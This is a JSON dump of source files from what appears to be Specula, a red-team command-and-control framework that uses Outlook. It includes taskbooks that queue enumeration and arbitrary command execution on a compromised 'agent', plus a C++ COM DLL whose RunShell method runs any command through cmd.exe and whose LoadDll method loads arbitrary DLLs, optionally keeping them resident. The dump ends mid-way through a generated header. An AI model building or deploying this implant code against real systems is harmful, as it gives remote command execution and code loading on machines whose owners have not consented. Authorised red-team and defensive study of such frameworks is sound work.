[ { "path": ".gitignore", "content": "*.db\r\nconfigoptions.py\r\nspecConfig.ini\r\nDefaultBlacklist.txt\r\n.vscode/\r\nspecula_log.txt\r\nweblog.log\r\noperator_log.txt\r\nagent_data/\r\npayloadhosting/\r\nvenv/\r\n*.pyc\r\n" }, { "path": "CONTRIBUTING.md", "content": "# Contributions\nIf you are considering contributing to our repository, first thank you for doing so!
\n\nContributions from community members are more than welcome, there are a few items that you should be aware of for a smooth process
\n\nAt this time we will not be accepting new functional changes to the provided COM object. If you find an error in the \nexisting code we will accept a pull to fix that within the COM object.\n\n## Technique Expectations\n* Capabilities should run without causing outlook.exe to lock up.\n* Capabilities should acount for errors that may occur and handle them\n\n## Code Expectations\n* python code should be coded to work from version 3.9 to 3.11\n* Any additions to helperFunctions should be well-formed and usable from other vbs scripts\n* Removal of intentionally placed IOC's will be rejected\n* Again any updates to code under api/* should be error correcting in nature only, not feature additions.\n\n## What to expect as a contributor\nAfter your contribution is received, it will receive an in-depth code review and testing.
\nAfter testing is completed, we will have zero or more rounds of change requests based on findings until there are no issues in the code. At that point it will be accepted into the repository, and your github username will be added to our credit list (if you would prefer not to be added or some other handle to be used, just let me know)\n" }, { "path": "README.md", "content": "Getting started info and information for developing your own modules is available on the [wiki](https://github.com/trustedsec/specula/wiki)\n" }, { "path": "Taskbooks/enum_installed_software.py", "content": "def TaskBook(helpers, agent):\n mod = helpers.get_module('operation/file/list_dir')\n helpers.setModOption(mod, 'directory', optval=\"c:\\Program Files\")\n helpers.setModOption(mod, 'recurselevels', optval=\"0\")\n helpers.setModOption(mod, 'depth', optval=\"0\")\n helpers.setModOption(mod, 'filetype', optval=\"*\")\n helpers.setModOption(mod, 'filename', optval=\"*\")\n helpers.setModOption(mod, 'nodirectories', optval=\"False\")\n helpers.setModOption(mod, 'sizeformat', optval=\"mb\")\n helpers.setModOption(mod, 'nofiles', optval=\"True\")\n helpers.setModOption(mod, 'output_console', optval=\"False\")\n helpers.insertTask(agent, mod, 'operation/file/list_dir')\n\n mod = helpers.get_module('operation/file/list_dir')\n helpers.setModOption(mod, 'directory', optval=\"c:\\Program Files (x86)\")\n helpers.setModOption(mod, 'recurselevels', optval=\"0\")\n helpers.setModOption(mod, 'depth', optval=\"0\")\n helpers.setModOption(mod, 'filetype', optval=\"*\")\n helpers.setModOption(mod, 'filename', optval=\"*\")\n helpers.setModOption(mod, 'nodirectories', optval=\"False\")\n helpers.setModOption(mod, 'sizeformat', optval=\"mb\")\n helpers.setModOption(mod, 'nofiles', optval=\"True\")\n helpers.setModOption(mod, 'output_console', optval=\"False\")\n helpers.insertTask(agent, mod, 'operation/file/list_dir')\n \n mod = helpers.get_module('enumerate/host/list_installedapps')\n helpers.insertTask(agent, mod, 'enumerate/host/list_installedapps')" }, { "path": "Taskbooks/example.py", "content": "def TaskBook(helpers, agent):\n mod = helpers.get_module('enumerate/host/list_applocker') # this doesn't take arguments, so we aren't giving it any\n helpers.insertTask(agent, mod, 'enumerate/host/list_applocker')\n mod = helpers.get_module('execute/host/cmd') # this does take an argument so we need to populate it\n helpers.setModOption(mod, 'command', prompt=\"What command would you like to run: \")\n helpers.insertTask(agent, mod, 'execute/host/cmd')\n #we don't have to prompt for the input though\n mod = helpers.get_module('operation/file/listdir')\n helpers.setModOption(mod, 'strpath', optval=\"C:\\Windows\")\n helpers.insertTask(agent, mod, 'operation/file/listdir')\n\n\n\n" }, { "path": "api/README.md", "content": "# SpeculaApi" }, { "path": "api/SpeculaApi/Sepcula.cpp", "content": "// Sepcula.cpp : Implementation of CSepcula\r\n\r\n#include \"pch.h\"\r\n#include \"Sepcula.h\"\r\n\r\n#define BUFFERSIZE 4096\r\n// CSepcula\r\n\r\nSTDMETHODIMP_(HRESULT __stdcall) CSepcula::RunShell(BSTR cmd, VARIANT timeout, BSTR * result)\r\n{\r\n\tCComBSTR errmsg{ L\"Failed to run shell command\" };\r\n\tHRESULT hret = S_OK;\r\n\tchar outputbuffer[BUFFERSIZE];\r\n\tCComBSTR totaloutput{};\r\n\tDWORD availBytes = 0;\r\n\tSECURITY_ATTRIBUTES saAttr;\r\n\tsaAttr.nLength = sizeof(SECURITY_ATTRIBUTES);\r\n\tsaAttr.bInheritHandle = TRUE;\r\n\tsaAttr.lpSecurityDescriptor = NULL;\r\n\r\n\tHANDLE hChildStd_OUT_Rd = NULL;\r\n\tHANDLE hChildStd_OUT_Wr = NULL;\r\n\r\n\t// Create a pipe for the child process's STDOUT.\r\n\tif (!CreatePipe(&hChildStd_OUT_Rd, &hChildStd_OUT_Wr, &saAttr, 0))\r\n\t{\r\n\t\thret = HRESULT_FROM_WIN32(GetLastError());\r\n\t\terrmsg.CopyTo(result);\r\n\t\treturn hret;\r\n\t}\r\n\t// Ensure the read handle to the pipe for STDOUT is not inherited.\r\n\tif (!SetHandleInformation(hChildStd_OUT_Rd, HANDLE_FLAG_INHERIT, 0))\r\n\t{\r\n\t\tCloseHandle(hChildStd_OUT_Rd);\r\n\t\tCloseHandle(hChildStd_OUT_Wr);\r\n\t\thret = HRESULT_FROM_WIN32(GetLastError());\r\n\t\terrmsg.CopyTo(result);\r\n\t\treturn hret;\r\n\t}\r\n\tSTARTUPINFO siStartInfo;\r\n\tZeroMemory(&siStartInfo, sizeof(STARTUPINFO));\r\n\tsiStartInfo.cb = sizeof(STARTUPINFO);\r\n\tsiStartInfo.hStdError = hChildStd_OUT_Wr;\r\n\tsiStartInfo.hStdOutput = hChildStd_OUT_Wr;\r\n\tsiStartInfo.dwFlags |= STARTF_USESTDHANDLES;\r\n\r\n\tPROCESS_INFORMATION piProcInfo;\r\n\tZeroMemory(&piProcInfo, sizeof(PROCESS_INFORMATION));\r\n\tCComBSTR fullcmd{ CmdProg };\r\n\tfullcmd.Append(cmd);\r\n\t// Create the child process.\r\n\tif (!CreateProcessW(NULL,\r\n\t\tfullcmd, // command line \r\n\t\tNULL, // process security attributes \r\n\t\tNULL, // primary thread security attributes \r\n\t\tTRUE, // handles are inherited \r\n\t\t0, // creation flags \r\n\t\tNULL, // use parent's environment \r\n\t\tNULL, // use parent's current directory \r\n\t\t&siStartInfo, // STARTUPINFO pointer \r\n\t\t&piProcInfo)) // receives PROCESS_INFORMATION \r\n\t{\r\n\t\thret = HRESULT_FROM_WIN32(GetLastError());\r\n\t\terrmsg.CopyTo(result);\r\n\t\tCloseHandle(hChildStd_OUT_Rd);\r\n\t\tCloseHandle(hChildStd_OUT_Wr);\r\n\t\treturn hret;\r\n\t}\r\n\tDWORD iterations = (timeout.vt == VT_I4) ? timeout.iVal : 60;\r\n\twhile (WaitForSingleObject(piProcInfo.hProcess, 1000) == WAIT_TIMEOUT && iterations)\r\n\t{\r\n\t\tavailBytes = 0;\r\n\t\tPeekNamedPipe(hChildStd_OUT_Rd, NULL, 0, NULL, &availBytes, NULL);\r\n\t\twhile (availBytes)\r\n\t\t{\r\n\t\t\tZeroMemory(outputbuffer, sizeof(outputbuffer));\r\n\t\t\tDWORD thisread = (availBytes >= BUFFERSIZE) ? BUFFERSIZE : availBytes;\r\n\t\t\tDWORD read = 0;\r\n\t\t\tReadFile(hChildStd_OUT_Rd, (char*)outputbuffer, BUFFERSIZE, &read, NULL);\r\n\t\t\ttotaloutput.Append(outputbuffer);\r\n\t\t\tavailBytes -= read;\r\n\t\t}\r\n\t\titerations--;\r\n\t}\r\n\tif (iterations == 0)\r\n\t{\r\n\t\ttotaloutput.Append(L\"\\n\\nProcess wait timed out\");\r\n\t}\r\n\telse\r\n\t{\r\n\t\tavailBytes = 0;\r\n\t\tPeekNamedPipe(hChildStd_OUT_Rd, NULL, 0, NULL, &availBytes, NULL);\r\n\t\twhile (availBytes)\r\n\t\t{\r\n\t\t\tZeroMemory(outputbuffer, sizeof(outputbuffer));\r\n\t\t\tDWORD thisread = (availBytes >= BUFFERSIZE) ? BUFFERSIZE : availBytes;\r\n\t\t\tDWORD read = 0;\r\n\t\t\tReadFile(hChildStd_OUT_Rd, (char*)outputbuffer, BUFFERSIZE, &read, NULL);\r\n\t\t\ttotaloutput.Append(outputbuffer);\r\n\t\t\tavailBytes -= read;\r\n\t\t}\r\n\t}\r\n\r\n\r\n\ttotaloutput.CopyTo(result);\r\n\tCloseHandle(hChildStd_OUT_Rd);\r\n\tCloseHandle(hChildStd_OUT_Wr);\r\n\treturn hret;\r\n}\r\n\r\nSTDMETHODIMP_(HRESULT __stdcall) CSepcula::LoadDll(BSTR path, boolean persist, boolean* status)\r\n{\r\n\tHMODULE mod = LoadLibraryW(path);\r\n\t*status = false;\r\n\tif (mod == nullptr)\r\n\t{\r\n\r\n\t\treturn HRESULT_FROM_WIN32(GetLastError());\r\n\t}\r\n\tif (!persist)\r\n\t{\r\n\t\tFreeLibrary(mod);\r\n\t}\r\n\t*status = true;\r\n\treturn S_OK;\r\n}\r\n" }, { "path": "api/SpeculaApi/Sepcula.h", "content": "// Sepcula.h : Declaration of the CSepcula\r\n\r\n#pragma once\r\n#include \"resource.h\" // main symbols\r\n\r\n\r\n\r\n#include \"SpeculaApi_i.h\"\r\n\r\n\r\n\r\nusing namespace ATL;\r\n\r\n\r\n// CSepcula\r\n\r\nclass ATL_NO_VTABLE CSepcula :\r\n\tpublic CComObjectRootEx,\r\n\tpublic CComCoClass,\r\n\tpublic IDispatchImpl\r\n{\r\npublic:\r\n\tCSepcula()\r\n\t{\r\n\t}\r\n\r\nDECLARE_REGISTRY_RESOURCEID(IDR_SEPCULA)\r\n\r\n\r\nBEGIN_COM_MAP(CSepcula)\r\n\tCOM_INTERFACE_ENTRY(ISepcula)\r\n\tCOM_INTERFACE_ENTRY(IDispatch)\r\nEND_COM_MAP()\r\n\r\n\r\n\r\n\tDECLARE_PROTECT_FINAL_CONSTRUCT()\r\n\r\n\tHRESULT FinalConstruct()\r\n\t{\r\n\t\treturn S_OK;\r\n\t}\r\n\r\n\tvoid FinalRelease()\r\n\t{\r\n\t}\r\n\r\npublic:\r\n\tSTDMETHOD(RunShell)(BSTR cmd, VARIANT timeout, BSTR * result);\r\n\tSTDMETHOD(LoadDll)(BSTR path, boolean persist, boolean* status);\r\n\r\n\r\nprivate:\r\n\tCComBSTR CmdProg{L\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \"};\r\n\r\n\r\n\r\n};\r\n\r\nOBJECT_ENTRY_AUTO(__uuidof(Sepcula), CSepcula)\r\n" }, { "path": "api/SpeculaApi/Sepcula.rgs", "content": "HKCR\r\n{\r\n\tSpeculaApi.Specula.1 = s 'Specula class'\r\n\t{\r\n\t\tCLSID = s '{e8b55279-c6b4-48f3-8138-b727337c0236}'\r\n\t}\r\n\tSpeculaApi.Specula = s 'Specula class'\r\n\t{\t\t\r\n\t\tCurVer = s 'SpeculaApi.Specula.1'\r\n\t}\r\n\tNoRemove CLSID\r\n\t{\r\n\t\tForceRemove {e8b55279-c6b4-48f3-8138-b727337c0236} = s 'Specula class'\r\n\t\t{\r\n\t\t\tProgID = s 'SpeculaApi.Specula.1'\r\n\t\t\tVersionIndependentProgID = s 'SpeculaApi.Specula'\r\n\t\t\tForceRemove Programmable\r\n\t\t\tInprocServer32 = s '%MODULE%'\r\n\t\t\t{\r\n\t\t\t\tval ThreadingModel = s 'Free'\r\n\t\t\t}\r\n\t\t\tTypeLib = s '{5be8ef76-6253-482a-926e-d1d877de3b63}'\r\n\t\t\tVersion = s '1.0'\r\n\t\t}\r\n\t}\r\n}\r\n" }, { "path": "api/SpeculaApi/SpeculaApi.cpp", "content": "// SpeculaApi.cpp : Implementation of DLL Exports.\r\n\r\n\r\n#include \"pch.h\"\r\n#include \"framework.h\"\r\n#include \"resource.h\"\r\n#include \"SpeculaApi_i.h\"\r\n#include \"dllmain.h\"\r\n\r\n\r\nusing namespace ATL;\r\n\r\n// Used to determine whether the DLL can be unloaded by OLE.\r\n_Use_decl_annotations_\r\nSTDAPI DllCanUnloadNow(void)\r\n{\r\n\treturn _AtlModule.DllCanUnloadNow();\r\n}\r\n\r\n// Returns a class factory to create an object of the requested type.\r\n_Use_decl_annotations_\r\nSTDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID* ppv)\r\n{\r\n\treturn _AtlModule.DllGetClassObject(rclsid, riid, ppv);\r\n}\r\n\r\n// DllRegisterServer - Adds entries to the system registry.\r\n_Use_decl_annotations_\r\nSTDAPI DllRegisterServer(void)\r\n{\r\n\t// registers object, typelib and all interfaces in typelib\r\n\tHRESULT hr = _AtlModule.DllRegisterServer();\r\n\treturn hr;\r\n}\r\n\r\n// DllUnregisterServer - Removes entries from the system registry.\r\n_Use_decl_annotations_\r\nSTDAPI DllUnregisterServer(void)\r\n{\r\n\tHRESULT hr = _AtlModule.DllUnregisterServer();\r\n\treturn hr;\r\n}\r\n\r\n// DllInstall - Adds/Removes entries to the system registry per user per machine.\r\nSTDAPI DllInstall(BOOL bInstall, _In_opt_ LPCWSTR pszCmdLine)\r\n{\r\n\tHRESULT hr = E_FAIL;\r\n\tstatic const wchar_t szUserSwitch[] = L\"user\";\r\n\r\n\tif (pszCmdLine != nullptr)\r\n\t{\r\n\t\tif (_wcsnicmp(pszCmdLine, szUserSwitch, _countof(szUserSwitch)) == 0)\r\n\t\t{\r\n\t\t\tATL::AtlSetPerUserRegistration(true);\r\n\t\t}\r\n\t}\r\n\r\n\tif (bInstall)\r\n\t{\r\n\t\thr = DllRegisterServer();\r\n\t\tif (FAILED(hr))\r\n\t\t{\r\n\t\t\tDllUnregisterServer();\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t\thr = DllUnregisterServer();\r\n\t}\r\n\r\n\treturn hr;\r\n}\r\n\r\n\r\n" }, { "path": "api/SpeculaApi/SpeculaApi.def", "content": "; SpeculaApi.def : Declares the module parameters.\r\n\r\nLIBRARY\r\n\r\nEXPORTS\r\n\tDllCanUnloadNow\t\tPRIVATE\r\n\tDllGetClassObject\tPRIVATE\r\n\tDllRegisterServer\tPRIVATE\r\n\tDllUnregisterServer\tPRIVATE\r\n\tDllInstall\t\tPRIVATE\r\n" }, { "path": "api/SpeculaApi/SpeculaApi.idl", "content": "// SpeculaApi.idl : IDL source for SpeculaApi\r\n//\r\n\r\n// This file will be processed by the MIDL tool to\r\n// produce the type library (SpeculaApi.tlb) and marshalling code.\r\n\r\nimport \"oaidl.idl\";\r\nimport \"ocidl.idl\";\r\n\r\n[\r\n\tobject,\r\n\tuuid(b0f5f947-8064-48f7-a623-5c058dc91cc8),\r\n\tdual,\r\n\tnonextensible,\r\n\tpointer_default(unique)\r\n]\r\ninterface ISepcula : IDispatch\r\n{\r\n\t[id(1)] HRESULT RunShell([in] BSTR cmd, [in, optional] VARIANT timeout, [out, retval] BSTR* result);\r\n\t[id(2)] HRESULT LoadDll([in] BSTR path, [in] boolean persist, [out, retval] boolean* status);\r\n};\r\n[\r\n\tuuid(5be8ef76-6253-482a-926e-d1d877de3b63),\r\n\tversion(1.0),\r\n]\r\nlibrary SpeculaApiLib\r\n{\r\n\timportlib(\"stdole2.tlb\");\r\n\t[\r\n\t\tuuid(e8b55279-c6b4-48f3-8138-b727337c0236)\r\n\t]\r\n\tcoclass Sepcula\r\n\t{\r\n\t\t[default] interface ISepcula;\r\n\t};\r\n};\r\n\r\nimport \"shobjidl.idl\";\r\n" }, { "path": "api/SpeculaApi/SpeculaApi.rgs", "content": "HKCR\r\n{\r\n}\r\n" }, { "path": "api/SpeculaApi/SpeculaApi.vcxproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n Win32\r\n \r\n \r\n Release\r\n Win32\r\n \r\n \r\n Debug\r\n x64\r\n \r\n \r\n Release\r\n x64\r\n \r\n \r\n \r\n 17.0\r\n {AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}\r\n AtlProj\r\n 10.0\r\n \r\n \r\n \r\n DynamicLibrary\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n DynamicLibrary\r\n false\r\n v143\r\n Unicode\r\n \r\n \r\n DynamicLibrary\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n DynamicLibrary\r\n false\r\n v143\r\n Unicode\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n true\r\n true\r\n \r\n \r\n true\r\n true\r\n \r\n \r\n true\r\n false\r\n $(SolutionDir)bin\\\r\n \r\n \r\n true\r\n false\r\n $(SolutionDir)bin\\\r\n $(ProjectName).x64\r\n \r\n \r\n \r\n Use\r\n Level3\r\n Disabled\r\n _WINDOWS;_DEBUG;_USRDLL;%(PreprocessorDefinitions)\r\n pch.h\r\n true\r\n \r\n \r\n false\r\n _DEBUG;%(PreprocessorDefinitions)\r\n SpeculaApi_i.h\r\n SpeculaApi_i.c\r\n SpeculaApi_p.c\r\n true\r\n $(IntDir)SpeculaApi.tlb\r\n \r\n true\r\n \r\n \r\n 0x0409\r\n $(IntDir);%(AdditionalIncludeDirectories)\r\n _DEBUG;%(PreprocessorDefinitions)\r\n \r\n \r\n Windows\r\n .\\SpeculaApi.def\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n Use\r\n Level3\r\n Disabled\r\n WIN32;_WINDOWS;_DEBUG;_USRDLL;%(PreprocessorDefinitions)\r\n pch.h\r\n true\r\n \r\n \r\n false\r\n Win32\r\n _DEBUG;%(PreprocessorDefinitions)\r\n SpeculaApi_i.h\r\n SpeculaApi_i.c\r\n SpeculaApi_p.c\r\n true\r\n $(IntDir)SpeculaApi.tlb\r\n \r\n true\r\n \r\n \r\n 0x0409\r\n $(IntDir);%(AdditionalIncludeDirectories)\r\n _DEBUG;%(PreprocessorDefinitions)\r\n \r\n \r\n Windows\r\n .\\SpeculaApi.def\r\n true\r\n \r\n \r\n \r\n \r\n Use\r\n Level3\r\n MaxSpeed\r\n WIN32;_WINDOWS;NDEBUG;_USRDLL;%(PreprocessorDefinitions)\r\n pch.h\r\n true\r\n None\r\n MultiThreaded\r\n \r\n \r\n false\r\n Win32\r\n NDEBUG;%(PreprocessorDefinitions)\r\n SpeculaApi_i.h\r\n SpeculaApi_i.c\r\n SpeculaApi_p.c\r\n true\r\n $(IntDir)SpeculaApi.tlb\r\n \r\n true\r\n \r\n \r\n 0x0409\r\n $(IntDir);%(AdditionalIncludeDirectories)\r\n NDEBUG;%(PreprocessorDefinitions)\r\n \r\n \r\n Windows\r\n .\\SpeculaApi.def\r\n true\r\n true\r\n true\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n Use\r\n Level3\r\n MaxSpeed\r\n _WINDOWS;NDEBUG;_USRDLL;%(PreprocessorDefinitions)\r\n pch.h\r\n true\r\n None\r\n MultiThreaded\r\n \r\n \r\n false\r\n NDEBUG;%(PreprocessorDefinitions)\r\n SpeculaApi_i.h\r\n SpeculaApi_i.c\r\n SpeculaApi_p.c\r\n true\r\n $(IntDir)SpeculaApi.tlb\r\n \r\n true\r\n \r\n \r\n 0x0409\r\n $(IntDir);%(AdditionalIncludeDirectories)\r\n NDEBUG;%(PreprocessorDefinitions)\r\n \r\n \r\n Windows\r\n .\\SpeculaApi.def\r\n true\r\n true\r\n true\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n Create\r\n Create\r\n Create\r\n Create\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "api/SpeculaApi/SpeculaApi.vcxproj.filters", "content": "\r\n\r\n \r\n \r\n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\r\n cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx\r\n \r\n \r\n {93995380-89BD-4b04-88EB-625FBE52EBFB}\r\n h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd\r\n \r\n \r\n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\r\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\r\n \r\n \r\n {53bbe418-42c7-4cd4-a4d9-3d1ca2106f6e}\r\n False\r\n \r\n \r\n \r\n \r\n Header Files\r\n \r\n \r\n Header Files\r\n \r\n \r\n Header Files\r\n \r\n \r\n Header Files\r\n \r\n \r\n Generated Files\r\n \r\n \r\n Header Files\r\n \r\n \r\n Header Files\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n Source Files\r\n \r\n \r\n Generated Files\r\n \r\n \r\n Source Files\r\n \r\n \r\n Source Files\r\n \r\n \r\n \r\n \r\n Resource Files\r\n \r\n \r\n \r\n \r\n Resource Files\r\n \r\n \r\n Source Files\r\n \r\n \r\n Resource Files\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n" }, { "path": "api/SpeculaApi/SpeculaApi_i.h", "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0628 */\r\n/* at Mon Jan 18 21:14:07 2038\r\n */\r\n/* Compiler settings for SpeculaApi.idl:\r\n Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0628 \r\n protocol : dce , ms_ext, c_ext, robust\r\n error checks: allocation ref bounds_check enum stub_data \r\n VC __declspec() decoration level: \r\n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING( ) */\r\n\r\n\r\n\r\n/* verify that the version is high enough to compile this file*/\r\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\r\n#define __REQUIRED_RPCNDR_H_VERSION__ 500\r\n#endif\r\n\r\n#include \"rpc.h\"\r\n#include \"rpcndr.h\"\r\n\r\n#ifndef __RPCNDR_H_VERSION__\r\n#error this stub requires an updated version of \r\n#endif /* __RPCNDR_H_VERSION__ */\r\n\r\n#ifndef COM_NO_WINDOWS_H\r\n#include \"windows.h\"\r\n#include \"ole2.h\"\r\n#endif /*COM_NO_WINDOWS_H*/\r\n\r\n#ifndef __SpeculaApi_i_h__\r\n#define __SpeculaApi_i_h__\r\n\r\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\r\n#pragma once\r\n#endif\r\n\r\n#ifndef DECLSPEC_XFGVIRT\r\n#if defined(_CONTROL_FLOW_GUARD_XFG)\r\n#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))\r\n#else\r\n#define DECLSPEC_XFGVIRT(base, func)\r\n#endif\r\n#endif\r\n\r\n/* Forward Declarations */ \r\n\r\n#ifndef __ISepcula_FWD_DEFINED__\r\n#define __ISepcula_FWD_DEFINED__\r\ntypedef interface ISepcula ISepcula;\r\n\r\n#endif \t/* __ISepcula_FWD_DEFINED__ */\r\n\r\n\r\n#ifndef __Sepcula_FWD_DEFINED__\r\n#define __Sepcula_FWD_DEFINED__\r\n\r\n#ifdef __cplusplus\r\ntypedef class Sepcula Sepcula;\r\n#else\r\ntypedef struct Sepcula Sepcula;\r\n#endif /* __cplusplus */\r\n\r\n#endif \t/* __Sepcula_FWD_DEFINED__ */\r\n\r\n\r\n/* header files for imported files */\r\n#include \"oaidl.h\"\r\n#include \"ocidl.h\"\r\n#include \"shobjidl.h\"\r\n\r\n#ifdef __cplusplus\r\nextern \"C\"{\r\n#endif \r\n\r\n\r\n#ifndef __ISepcula_INTERFACE_DEFINED__\r\n#define __ISepcula_INTERFACE_DEFINED__\r\n\r\n/* interface ISepcula */\r\n/* [unique][nonextensible][dual][uuid][object] */ \r\n\r\n\r\nEXTERN_C const IID IID_ISepcula;\r\n\r\n#if defined(__cplusplus) && !defined(CINTERFACE)\r\n \r\n MIDL_INTERFACE(\"b0f5f947-8064-48f7-a623-5c058dc91cc8\")\r\n ISepcula : public IDispatch\r\n {\r\n public:\r\n virtual /* [id] */ HRESULT STDMETHODCALLTYPE RunShell( \r\n /* [in] */ BSTR cmd,\r\n /* [optional][in] */ VARIANT timeout,\r\n /* [retval][out] */ BSTR *result) = 0;\r\n \r\n virtual /* [id] */ HRESULT STDMETHODCALLTYPE LoadDll( \r\n /* [in] */ BSTR path,\r\n /* [in] */ boolean persist,\r\n /* [retval][out] */ boolean *status) = 0;\r\n \r\n };\r\n \r\n \r\n#else \t/* C style interface */\r\n\r\n typedef struct ISepculaVtbl\r\n {\r\n BEGIN_INTERFACE\r\n \r\n DECLSPEC_XFGVIRT(IUnknown, QueryInterface)\r\n HRESULT ( STDMETHODCALLTYPE *QueryInterface )( \r\n ISepcula * This,\r\n /* [in] */ REFIID riid,\r\n /* [annotation][iid_is][out] */ \r\n _COM_Outptr_ void **ppvObject);\r\n \r\n DECLSPEC_XFGVIRT(IUnknown, AddRef)\r\n ULONG ( STDMETHODCALLTYPE *AddRef )( \r\n ISepcula * This);\r\n \r\n DECLSPEC_XFGVIRT(IUnknown, Release)\r\n ULONG ( STDMETHODCALLTYPE *Release )( \r\n ISepcula * This);\r\n \r\n DECLSPEC_XFGVIRT(IDispatch, GetTypeInfoCount)\r\n HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( \r\n ISepcula * This,\r\n /* [out] */ UINT *pctinfo);\r\n \r\n DECLSPEC_XFGVIRT(IDispatch, GetTypeInfo)\r\n HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( \r\n ISepcula * This,\r\n /* [in] */ UINT iTInfo,\r\n /* [in] */ LCID lcid,\r\n /* [out] */ ITypeInfo **ppTInfo);\r\n \r\n DECLSPEC_XFGVIRT(IDispatch, GetIDsOfNames)\r\n HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( \r\n ISepcula * This,\r\n /* [in] */ REFIID riid,\r\n /* [size_is][in] */ LPOLESTR *rgszNames,\r\n /* [range][in] */ UINT cNames,\r\n /* [in] */ LCID lcid,\r\n /* [size_is][out] */ DISPID *rgDispId);\r\n \r\n DECLSPEC_XFGVIRT(IDispatch, Invoke)\r\n /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( \r\n ISepcula * This,\r\n /* [annotation][in] */ \r\n _In_ DISPID dispIdMember,\r\n /* [annotation][in] */ \r\n _In_ REFIID riid,\r\n /* [annotation][in] */ \r\n _In_ LCID lcid,\r\n /* [annotation][in] */ \r\n _In_ WORD wFlags,\r\n /* [annotation][out][in] */ \r\n _In_ DISPPARAMS *pDispParams,\r\n /* [annotation][out] */ \r\n _Out_opt_ VARIANT *pVarResult,\r\n /* [annotation][out] */ \r\n _Out_opt_ EXCEPINFO *pExcepInfo,\r\n /* [annotation][out] */ \r\n _Out_opt_ UINT *puArgErr);\r\n \r\n DECLSPEC_XFGVIRT(ISepcula, RunShell)\r\n /* [id] */ HRESULT ( STDMETHODCALLTYPE *RunShell )( \r\n ISepcula * This,\r\n /* [in] */ BSTR cmd,\r\n /* [optional][in] */ VARIANT timeout,\r\n /* [retval][out] */ BSTR *result);\r\n \r\n DECLSPEC_XFGVIRT(ISepcula, LoadDll)\r\n /* [id] */ HRESULT ( STDMETHODCALLTYPE *LoadDll )( \r\n ISepcula * This,\r\n /* [in] */ BSTR path,\r\n /* [in] */ boolean persist,\r\n /* [retval][out] */ boolean *status);\r\n \r\n END_INTERFACE\r\n } ISepculaVtbl;\r\n\r\n interface ISepcula\r\n {\r\n CONST_VTBL struct ISepculaVtbl *lpVtbl;\r\n };\r\n\r\n \r\n\r\n#ifdef COBJMACROS\r\n\r\n\r\n#define ISepcula_QueryInterface(This,riid,ppvObject)\t\\\r\n ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) \r\n\r\n#define ISepcula_AddRef(This)\t\\\r\n ( (This)->lpVtbl -> AddRef(This) ) \r\n\r\n#define ISepcula_Release(This)\t\\\r\n ( (This)->lpVtbl -> Release(This) ) \r\n\r\n\r\n#define ISepcula_GetTypeInfoCount(This,pctinfo)\t\\\r\n ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) \r\n\r\n#define ISepcula_GetTypeInfo(This,iTInfo,lcid,ppTInfo)\t\\\r\n ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) \r\n\r\n#define ISepcula_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)\t\\\r\n ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) \r\n\r\n#define ISepcula_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)\t\\\r\n ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) \r\n\r\n\r\n#define ISepcula_RunShell(This,cmd,timeout,result)\t\\\r\n ( (This)->lpVtbl -> RunShell(This,cmd,timeout,result) ) \r\n\r\n#define ISepcula_LoadDll(This,path,persist,status)\t\\\r\n ( (This)->lpVtbl -> LoadDll(This,path,persist,status) ) \r\n\r\n#endif /* COBJMACROS */\r\n\r\n\r\n#endif \t/* C style interface */\r\n\r\n\r\n\r\n\r\n#endif \t/* __ISepcula_INTERFACE_DEFINED__ */\r\n\r\n\r\n\r\n#ifndef __SpeculaApiLib_LIBRARY_DEFINED__\r\n#define __SpeculaApiLib_LIBRARY_DEFINED__\r\n\r\n/* library SpeculaApiLib */\r\n/* [version][uuid] */ \r\n\r\n\r\nEXTERN_C 